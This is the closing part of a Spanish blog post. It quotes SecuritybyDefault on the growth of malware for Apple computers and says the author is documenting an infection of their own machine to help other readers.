Teruel por supuesto que existe y el que no quiera ver que el malware para Apple cada vez está más a la orden del día debido al espectacular crecimiento de ventas y popularidad de la marca de la manzana, es querer seguir creyendo en los reyes magos. El malware para Apple es un hecho y ha llegado para quedarse! "


Toda cita textual a sido tomada desde SecuritybyDefaul y ha si identificada ente comillas "", sin embargo los datos publicados sobre la infección del equipo son propios


El objetivo de esta publicación es exponer la infección con la finalidad que le pueda servir  mas personas la publicación

No hay comentarios: